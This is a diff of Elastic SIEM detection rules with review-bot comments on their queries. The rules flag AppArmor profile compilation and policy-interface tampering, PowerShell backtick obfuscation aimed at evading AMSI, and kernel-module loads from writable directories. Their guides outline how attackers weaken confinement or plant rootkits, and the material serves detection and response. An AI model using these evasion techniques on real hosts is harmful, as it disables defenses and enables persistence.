An attacker with root access can compile a custom profile that grants a trojanized service broader file or capability access, then load it to weaken confinement and support privilege escalation or stealthy persistence.\n\n### Possible investigation steps\n\n- Review the full command line, parent and ancestor process chain, executing user, tty or session, and working directory to determine whether the activity came from expected package management or configuration tooling versus an interactive shell.\n- Identify the source profile and output file paths, then inspect the profile for broad file access, dangerous capability grants, unconfined transitions, or complain/disable settings that would weaken confinement for sensitive binaries or services.\n- Correlate nearby events for writes under AppArmor policy directories, subsequent policy loads or reloads, package installation actions, and restarts of the targeted application to confirm whether the compiled profile was actually deployed.\n- Compare the activity against host and peer-system baselines and validate it with change records, deployment jobs, or package updates tied to the same account or system to quickly distinguish administrative maintenance from anomalous behavior.\n- If the execution is not authorized, preserve the generated profile and related scripts, restore affected policy files from a known-good source, and review recent privileged activity on the host for additional persistence or defense-evasion changes.\n\n### False positive analysis\n\n- Operating system package installation or upgrade can invoke apparmor_parser with -o to precompile a vendor profile during a post-install action; verify this by reviewing the parent process and nearby package-management activity for an authorized update at the same time.\n- A system administrator may compile a new or modified local AppArmor profile while hardening or troubleshooting a service; verify the executing user, source and output file paths, and whether 
the change aligns with approved maintenance or documented policy updates.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network and stop any service whose confinement was altered if the compiled profile was loaded or written into `/etc/apparmor.d/` or AppArmor cache directories, to prevent further policy abuse.\n- Preserve the malicious source profile, compiled output, invoking script, and shell history for evidence, then delete unauthorized files from `/etc/apparmor.d/`, `/etc/apparmor.d/disable/`, and cache paths and unload the rogue policy with approved AppArmor administration commands.\n- Remove attacker persistence by reviewing and cleaning systemd unit files, timers, cron entries, package maintainer scripts, login startup files, and sudoers changes that call `apparmor_parser` or restore the profile at boot.\n- Reset or revoke credentials used on the host, including root and sudo-capable accounts, service account secrets, and unauthorized `authorized_keys`, if the attacker had interactive access or modified privileged services.\n- Restore AppArmor policy files, affected binaries, and related service configurations from trusted packages, configuration management, or a gold image, then reload AppArmor in enforce mode and confirm the targeted program is confined by the expected profile.\n- Escalate to incident response immediately if the custom profile targeted `sshd`, `sudo`, container runtimes, web-facing daemons, or appears on multiple hosts, and harden the environment by limiting write access to AppArmor policy paths, alerting on future `apparmor_parser -o` use outside approved package activity, and enforcing change control for policy updates.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\nprocess.name == \"apparmor_parser\" and process.args in (\"--ofile*\", \"-o*\", 
\"--output*\")\n", + "references": [ + "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d26331be-affe-46b2-bf4e-203d0e2d364c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d26331be-affe-46b2-bf4e-203d0e2d364c_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d32f0c27-8edb-4bcf-975e-01696c961e08_1.json b/packages/security_detection_engine/kibana/security_rule/d32f0c27-8edb-4bcf-975e-01696c961e08_1.json new file mode 100644 index 00000000000..bedbab3bf2d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d32f0c27-8edb-4bcf-975e-01696c961e08_1.json 
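Review bot: The final clause of `query`, `process.args in ("--ofile*", "-o*", "--output*")`, looks like it can never match a real invocation: in Elastic EQL, `in` is an exact case-sensitive comparison that, as far as I can tell, does not expand `*`, so only an argument literally equal to `-o*` would satisfy it, while `apparmor_parser -o out.bin profile` carries the argument `-o`. Change it to the wildcard-aware form `process.args like ("--ofile*", "-o*", "--output*")` (or `:` if case-insensitive matching is preferred); the `*` then also covers the bare `-o` value and the attached `-ofile` form. Replaying a sample exec event against the rule before merging would confirm the fix. The `setup` text also says the rule requires Elastic Defend, while `index` additionally reads Endgame, CrowdStrike, SentinelOne and auditd data; either list those sources there or note that Defend is the recommended one.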
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access to AppArmor kernel policy control interfaces through the .load, .replace, or .remove files under /sys/kernel/security/apparmor/. These special files are used to load, modify, or remove AppArmor profiles and are rarely accessed during normal system activity outside of policy administration. Reads or writes to these interfaces may indicate legitimate security configuration changes, but can also reflect defense evasion, unauthorized policy tampering, or the installation of attacker-controlled profiles. This detection is especially valuable on systems where AppArmor policy changes are uncommon or tightly controlled.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AppArmor Policy Interface Access", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AppArmor Policy Interface Access\n\nThis rule detects reads, writes, or deletions against the Linux AppArmor policy control files that load, replace, or remove profiles, actions that directly change how the kernel restricts processes. 
That matters because unauthorized access to these interfaces can disable enforcement or install permissive rules that hide malicious activity; for example, an intruder with elevated privileges might replace a profile protecting a web server so a dropped backdoor can run and touch sensitive files without confinement.\n\n### Possible investigation steps\n\n- Determine whether the access coincides with an approved AppArmor administration task by validating the initiating account, privilege escalation history, maintenance windows, and any related change or deployment records for the host.\n- Review the full execution lineage around the event to confirm whether the interface was touched by expected policy management activity such as package updates or configuration automation versus an interactive shell, ad hoc script, or remote session.\n- Inspect recent changes to AppArmor profile files and deployment artifacts under standard policy locations to identify which profile was loaded, replaced, or removed and whether the resulting policy became weaker or disabled confinement for sensitive services.\n- Correlate the activity with nearby authentication, sudo, process execution, and network events on the same system to assess whether the policy modification was part of normal administration or followed potentially malicious hands-on-keyboard behavior.\n- If the change is not authorized, preserve the modified policy artifacts and relevant host evidence, then restore known-good AppArmor profiles from a trusted source and verify enforcement is active to prevent further defense evasion.\n\n### False positive analysis\n\n- Approved system maintenance such as package updates, service installation, or boot-time policy initialization can legitimately access AppArmor `.load` or `.replace`, so verify the parent process and command line map to expected package management or startup activity during a documented change window.\n- An administrator may manually reload, replace, or remove an 
AppArmor profile while troubleshooting or deploying a local service, so confirm the initiating user, any `sudo` or privileged session history, and recent edits to AppArmor profile files align with an authorized operational task.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network while preserving forensic access, terminate the process or shell session that wrote to `/sys/kernel/security/apparmor/.load`, `.replace`, or `.remove`, and disable the originating account\u2019s privileged access until the scope is understood.\n- Collect and review the active AppArmor state and on-disk profiles from `/etc/apparmor.d/`, recent shell history, sudo activity, and any scripts or package hooks involved, then remove attacker-added profiles and reverse any profile changes that weakened or removed confinement.\n- Hunt for and delete persistence that relied on the AppArmor change, including malicious systemd units, cron entries, startup scripts, modified container launch settings, or dropped binaries that were able to run only after the profile was replaced or removed.\n- Restore the system to a known-good state by reinstalling trusted AppArmor policy packages or redeploying validated profiles from source control, reloading them with approved tools, and rebuilding the host from a clean image if root access or core security files were modified.\n- Escalate to incident response immediately if the tampered profile protected an internet-facing service, credential store, or security tool, if the same behavior is seen on multiple hosts, or if the attacker also changed sudoers, SSH access, or other local security controls.\n- Harden the environment by restricting who can administer AppArmor, requiring signed or change-controlled profile updates, alerting on future writes to the AppArmor policy interfaces, and validating that critical services remain in enforce mode after patching or deployment.", + "query": "file where host.os.type == \"linux\" and 
event.action in (\"opened-file\", \"wrote-to-file\", \"deleted\") and\nfile.path in (\n \"/sys/kernel/security/apparmor/.load\", \".load\",\n \"/sys/kernel/security/apparmor/.replace\", \".replace\",\n \"/sys/kernel/security/apparmor/.remove\", \".remove\"\n)\n", + "references": [ + "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d32f0c27-8edb-4bcf-975e-01696c961e08", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. 
However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /sys/kernel/security/apparmor/.load -p rw -k apparmor_policy_change\n-w /sys/kernel/security/apparmor/.replace -p rw -k apparmor_policy_change\n-w /sys/kernel/security/apparmor/.remove -p rw -k apparmor_policy_change\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Auditd Manager", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d32f0c27-8edb-4bcf-975e-01696c961e08_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_6.json b/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_6.json deleted file mode 100644 index 873c01eb82c..00000000000 
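Review bot: The `file.path` list in `query` mixes the absolute securityfs paths with the bare names `.load`, `.replace` and `.remove`, and the bare entries match a file of that name in any directory, not only under `/sys/kernel/security/apparmor/` as the description and the audit watches in `setup` are scoped to. I assume they are there because auditd PATH records can carry a cwd-relative name; if so, say that in the `setup` text, and where the data populates `process.working_directory`, pair the relative entries with a check on it so an unrelated `.load` in a build tree does not fire. The `event.action` list also includes `deleted`, while the documented watches use `-p rw` and, as far as I know, these securityfs nodes cannot be unlinked from userspace, so that value looks unreachable; drop it or document why it is kept.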
--- a/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_6.json +++ /dev/null 
@@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use backtick-escaped characters inside ${} variable expansion as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques like backtick-escaped variable expansion to evade detection. This method involves disguising malicious scripts to bypass security measures. 
The detection rule identifies scripts with excessive length and specific obfuscation patterns, flagging potential threats for further analysis.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the content of the script and identify any suspicious or malicious commands.\n- Examine the `file.path` and `file.name` fields to determine the origin and context of the script execution, which may provide insights into whether the script is part of a legitimate process or potentially malicious activity.\n- Check the `host.name` and `agent.id` fields to identify the affected system and correlate with other security events or logs from the same host for additional context.\n- Analyze the `user.id` field to determine which user account executed the script, and assess whether this activity aligns with the user's typical behavior or role.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution flow of the script and identify any related script blocks that may have been executed in sequence.\n- Consider the `count` field to evaluate the extent of obfuscation used in the script, which may indicate the level of sophistication or intent behind the script.\n\n### False positive analysis\n\n- Scripts with legitimate administrative functions may use backtick-escaped variable expansion for complex string manipulations. Review the script's context and purpose to determine if it aligns with expected administrative tasks.\n- Automated scripts generated by trusted software might include obfuscation patterns as part of their normal operation. Verify the source and integrity of the software to ensure it is from a reputable vendor.\n- Developers and IT professionals may use obfuscation techniques during testing or development phases. 
Establish a process to whitelist known development environments or user accounts to reduce unnecessary alerts.\n- PowerShell scripts that are part of legitimate security tools or monitoring solutions may trigger the rule. Identify and exclude these tools by their file path or script block ID to prevent false positives.\n- Regularly update the list of known false positives based on historical data and feedback from users to refine the detection rule and improve its accuracy.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of the potentially malicious script across the network.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of obfuscated scripts.\n- Conduct a thorough review of the script block text and associated file paths to identify and remove any malicious scripts or files from the system.\n- Reset credentials for any user accounts involved in the alert to mitigate the risk of compromised credentials being used for further attacks.\n- Escalate the incident to the security operations team for a deeper investigation into potential lateral movement or additional compromised systems.\n- Implement enhanced monitoring on the affected host and similar systems to detect any recurrence of obfuscation techniques or related suspicious activities.\n- Update endpoint protection and intrusion detection systems with indicators of compromise (IOCs) derived from the analysis to improve detection capabilities for similar threats in the future.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting 
them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"\\$\\{(\\w++`){2,}\\w++\\}\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.name,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - 
"name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "d43f2b43-02a1-4219-8ce9-10929a32a618", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - 
"name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "d43f2b43-02a1-4219-8ce9-10929a32a618_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c_2.json b/packages/security_detection_engine/kibana/security_rule/d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c_2.json new file mode 100644 index 00000000000..629a7d68f30 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c_2.json 
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Module Load from Unusual Location", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kernel Module Load from Unusual Location\n\nThis rule detects attempts to load Linux kernel modules from atypical directories, which can indicate an attacker trying to run code in kernel space for stealth and long-term persistence. Adversaries often drop a malicious `.ko` into writable paths like `/tmp` or `/dev/shm` after initial access, then use `insmod` or `modprobe` to insert it and hide processes, files, or network activity as a rootkit.\n\n### Possible investigation steps\n\n- Capture the full command line and resolve any referenced `.ko` path, then collect the module file for hashing and static analysis to determine provenance and known-malware matches. \n- Confirm whether the module is currently loaded by querying `lsmod`/`/proc/modules`, then map it to its on-disk location with `modinfo -n ` (or `/sys/module//sections/*`) to validate it was loaded from the suspicious directory. 
\n- Review recent kernel and audit telemetry (`dmesg`, `/var/log/kern.log`, `journalctl -k`, and any audit records) around the event time for insertion messages, signature/taint indicators, and any follow-on errors suggesting tampering. \n- Identify the initiating user/session and execution chain (parent process tree, TTY/SSH source, container context), then determine whether the action aligns with legitimate admin activity or coincides with other compromise signals on the host. \n- Hunt for persistence and repeatability by checking for recurring module-load attempts and inspecting boot-time and scheduled execution paths (systemd units, init scripts, cron, rc.local) that could reload the module after reboot.\n\n### False positive analysis\n\n- A system administrator or automated maintenance workflow may build or test an out-of-tree kernel module and load it with `insmod`/`modprobe` from a staging directory such as `/tmp`, `/root`, or `/mnt` before installing it into standard module paths. \n- A legitimate bootstrapping or recovery operation may load a required driver module from nonstandard media or temporary runtime locations (e.g., `/boot`, `/run`, `/var/run`, or `/mnt`) during troubleshooting, initramfs/early-boot tasks, or mounting encrypted/storage devices.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network and disable external access (e.g., revoke SSH keys or block inbound SSH) to prevent additional module loads or lateral movement while preserving evidence. \n- If the suspicious module is currently loaded, record `lsmod` and `modinfo` output, then unload it where safe (`modprobe -r `/`rmmod `) and quarantine the corresponding `.ko` from the unusual path (e.g., `/tmp`, `/dev/shm`, `/home`, `/mnt`) for hashing and malware analysis. 
\n- Remove persistence mechanisms that would reload the module by deleting or disabling any related systemd units, init scripts, cron entries, and boot-time hooks, and validate `/etc/modules-load.d/`, `/lib/modules/$(uname -r)/`, and `depmod` outputs for unauthorized additions. \n- Recover the host by restoring known-good kernel/module packages and rebuilding the initramfs, then reboot and verify no unexpected modules remain in `/proc/modules` and no new load attempts occur from writable directories. \n- Escalate immediately to IR/forensics and consider full host rebuild if the module is unsigned/unknown, the kernel is tainted, module removal fails, or post-reboot evidence indicates stealth behavior consistent with a rootkit. \n- Harden by restricting module loading (enable Secure Boot/module signature enforcement where supported, set `kernel.modules_disabled=1` after boot on fixed-function systems, and limit `CAP_SYS_MODULE` to trusted admins), and enforce file integrity monitoring/permissions to prevent `.ko` creation in world-writable locations.", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name == \"kmod\" and process.args == \"insmod\" and process.args like~ \"*.ko*\") or\n (process.name == \"kmod\" and process.args == \"modprobe\" and not process.args in (\"-r\", \"--remove\")) or\n (process.name == \"insmod\" and process.args like~ \"*.ko*\") or\n (process.name == \"modprobe\" and not process.args in (\"-r\", \"--remove\"))\n) and (\n process.working_directory like (\n \"/tmp*\", \"/var/tmp*\", \"/dev/shm*\", \"/run*\", \"/var/run*\", \"/home*/*\", \"/root*\",\n \"/var/www*\", \"/boot*\", \"/srv*\", \"/mnt*\", \"/media*\"\n ) or\n process.parent.working_directory like (\n \"/tmp*\", \"/var/tmp*\", \"/dev/shm*\", \"/run*\", \"/var/run*\", \"/home*/*\", \"/root*\",\n \"/var/www*\", \"/boot*\", \"/srv*\", \"/mnt*\", \"/media*\"\n ) or\n process.args like (\n \"/tmp/*\", 
\"/var/tmp/*\", \"/dev/shm/*\", \"/run/*\", \"/var/run/*\", \"/home/*/*\", \"/root/*\",\n \"/var/www/*\", \"/boot/*\", \"/srv/*\", \"/mnt/*\", \"/media/*\", \"./*\"\n )\n) and\nnot (\n process.parent.executable == \"/usr/bin/podman\" or\n process.working_directory like \"/tmp/newroot\"\n)\n", + "references": [ + "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Threat: Rootkit", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": 